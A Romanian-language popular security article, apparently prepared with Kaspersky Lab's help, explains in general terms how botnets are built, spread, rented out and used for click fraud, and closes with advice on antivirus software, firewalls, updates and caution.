Din păcate, pentru cineva care a decis să organizeze o rețea botnet de la zero, nu va fi dificil să găsească instrucțiuni pe Internet pentru crearea unei rețele de zombi. Primul pas: creați o nouă rețea de zombi. Pentru a face acest lucru, trebuie să infectați computerele utilizatorilor cu un program special - un bot. Trimiterile de spam, postarea de mesaje pe forumuri și rețele sociale și alte metode sunt folosite pentru a infecta; de multe ori bot-ul este înzestrat cu funcția de autopropagare, precum virușii sau viermii.

Pentru a forța o potențială victimă să instaleze un bot, sunt utilizate tehnici de inginerie socială. De exemplu, se oferă să vizioneze un videoclip interesant, care necesită descărcarea unui codec special. După descărcarea și rularea unui astfel de fișier, utilizatorul, desigur, nu va putea viziona niciun videoclip și, cel mai probabil, nu va observa deloc nicio modificare, iar computerul său va fi infectat și va deveni un umil servitor care execută toate comenzile de maestrul botnetului.

Cea de-a doua metodă de infectare cu botul folosită pe scară largă este descărcarea drive-by. Când un utilizator vizitează o pagină web infectată, codul rău intenționat este descărcat pe computerul său prin diverse „găuri” din aplicații – în primul rând în browserele populare. Pentru a exploata punctele slabe, se folosesc programe speciale - exploit-uri. Acestea permit nu numai descărcarea în tăcere, ci și lansarea în tăcere a unui virus sau bot. Acest tip de distribuție de malware este cel mai periculos, deoarece dacă o resursă populară este piratată, zeci de mii de utilizatori vor fi infectați!

Botul poate fi dotat cu funcția de autopropagare prin rețele de calculatoare. De exemplu, se poate răspândi prin infectarea tuturor fișierelor executabile disponibile sau prin căutarea și infectarea computerelor vulnerabile din rețea.

Calculatoarele infectate ale utilizatorilor nebănuiți pot fi controlate de către creatorul rețelei botnet folosind centrul de comandă al rețelei botnet, contactând roboții printr-un canal IRC, o conexiune web sau orice alte mijloace disponibile. Este suficient să combinați câteva zeci de mașini într-o rețea pentru ca botnetul să înceapă să genereze venituri pentru proprietarul său. Mai mult, acest venit depinde liniar de stabilitatea rețelei de zombi și de rata de creștere a acesteia.

Companiile de publicitate care operează online în cadrul schemei PPC (Plată-per-Click) plătesc bani pentru clicuri unice pe link-urile de pe anunțurile postate pe Internet. Pentru proprietarii de botnet, fraudarea unor astfel de companii este o afacere profitabilă. Luați ca exemplu binecunoscuta rețea Google AdSense. Agenții de publicitate incluși în acesta plătesc Google pentru clicurile pe anunțurile plasate în speranța că utilizatorul care s-a uitat „la lumină” va cumpăra ceva de la ei.

Google, la rândul său, plasează publicitate contextuală pe diferite site-uri care participă la programul AdSense, plătind proprietarului site-ului un procent din fiecare clic. Din păcate, nu toți proprietarii de site-uri sunt sinceri. Cu o rețea zombie, un hacker poate genera mii de clicuri unice pe zi, câte unul de la fiecare mașină, fără a trezi suspiciunile Google. Astfel, banii cheltuiți în campania publicitară vor curge în buzunarul hackerului. Din păcate, nu a existat încă niciun caz când cineva a fost tras la răspundere pentru astfel de acțiuni. Potrivit Click Forensics, în 2008, aproximativ 16-17% din toate clicurile pe link-urile publicitare erau false, dintre care cel puțin o treime a fost generată de botnet-uri. Făcând câteva calcule simple, puteți înțelege că anul trecut proprietarii de botnet-uri au „clic” 33.000.000 de dolari. Venituri bune din clicuri de mouse!

Atacatorii și oamenii de afaceri necinstiți nu trebuie să creeze un botnet de la zero pe cont propriu. Ei pot cumpăra sau închiria botnet-uri de diferite dimensiuni și performanțe de la hackeri - de exemplu, contactând forumuri specializate.

Costul unui botnet finit, precum și costul închirierii acesteia, depind direct de numărul de computere incluse în ea. Rețelele botne gata făcute sunt cele mai populare pe forumurile în limba engleză.

Rețelele bot mici, formate din câteva sute de roboți, costă între 200 și 700 USD. În același timp, prețul mediu al unui bot este de aproximativ 50 de cenți. Rețelele bot mai mari costă mai mulți bani.

Creată în urmă cu câțiva ani de un hacker de 19 ani din Olanda, rețeaua de zombi Shadow avea peste 100.000 de computere situate în întreaga lume și vândute cu 25.000 de euro. Pentru acești bani, puteți cumpăra o casă mică în Spania, dar criminalul din Brazilia a preferat să cumpere un botnet.

Instrumente de protecție botnet

1. În primul rând, acestea sunt programe antivirus și pachete cuprinzătoare pentru protecție împotriva amenințărilor de pe Internet cu baze de date actualizate în mod regulat. Ele vor ajuta nu numai la detectarea pericolului la timp, ci și la eliminarea acestuia înainte ca credinciosul „prieten de fier” transformat într-un zombi să înceapă să trimită spam sau site-uri „să arunce”. Pachetele cuprinzătoare, cum ar fi Kaspersky Internet Security 2009, conțin un set complet de caracteristici de securitate care pot fi gestionate printr-un centru de comandă comun.

Modulul antivirus scanează cele mai importante zone ale sistemului din fundal și monitorizează toate modalitățile posibile de invadare a virușilor: atașamentele de e-mail și site-urile web potențial periculoase.

Firewall-ul monitorizează comunicarea dintre computerul personal și Internet. Acesta inspectează toate pachetele de date primite de la sau trimise pe Web și, dacă este necesar, blochează atacurile de rețea și împiedică trimiterea secretă a datelor private pe Internet.

Filtrul de spam vă protejează căsuța poștală de mesajele publicitare. Sarcinile sale includ și detectarea e-mailurilor de phishing, cu ajutorul cărora atacatorii încearcă să extragă de la utilizator informații despre datele acestuia pentru a se conecta la sistemele de plată online sau bancare.

2. Actualizări regulate ale sistemului de operare, browserelor web și altor aplicații, ai căror dezvoltatori descoperă și elimină multe lacune în protecția lor, precum și punctele slabe folosite de atacatori.

3. Programele speciale de criptare vă vor proteja datele personale, chiar dacă bot-ul a pătruns deja în computer, deoarece pentru a le accesa va trebui să spargă parola.

4. Bun simț și prudență. Dacă doriți să vă protejați datele de diverse tipuri de amenințări, nu trebuie să descărcați și să instalați programe de origine necunoscută, să deschideți arhive cu fișiere contrare avertizărilor antivirus, să vizitați site-uri pe care browserul le marchează ca periculoase etc.

Mulțumim Kaspersky Lab pentru ajutor în pregătirea materialului